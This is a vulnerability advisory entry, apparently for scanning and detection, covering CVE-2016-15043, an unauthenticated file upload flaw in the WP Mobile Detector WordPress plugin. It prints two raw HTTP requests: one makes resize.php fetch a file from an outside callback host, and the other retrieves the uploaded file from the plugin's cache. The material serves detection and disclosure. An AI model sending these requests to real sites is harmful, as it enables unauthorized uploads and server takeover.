| Title | WP Mobile Detector <= 3.5 - Unrestricted File Upload |
|---|---|
| Author | D3nverNg,thewindghost |
| Severity | Critical |
| Impact | Unauthenticated attackers can upload arbitrary files, potentially leading to remote code execution and full server compromise. |
| Remediation | Update to the latest version of WP Mobile Detector plugin. |
| CVSS Score | 9.8 |
| EPSS Score | 0.85359 |
| CVE ID | CVE-2016-15043 |
| CWE ID | CWE-434 |
| Tags | cve cve2016 wordpress wp wp-plugin file-upload rce intrusive vkev |
WP Mobile Detector plugin for WordPress <= 3.5 contains an unrestricted file upload vulnerability caused by missing file type validation in resize.php, letting unauthenticated attackers upload arbitrary files, potentially leading to remote code execution.
GET /wp-content/plugins/wp-mobile-detector/resize.php?src=http://d5jqj7ple0o34e5k5jt0tuw6bf7g137xe.oast.site/jjXMHReY HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
Connection: close
Accept-Encoding: gzip
GET /wp-content/plugins/wp-mobile-detector/cache/jjXMHReY HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763
Connection: close
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2016/CVE-2016-15043.yaml
🦈 Packet Capture: ⬇️ Download cve-2016-15043.pcap
N/AN/A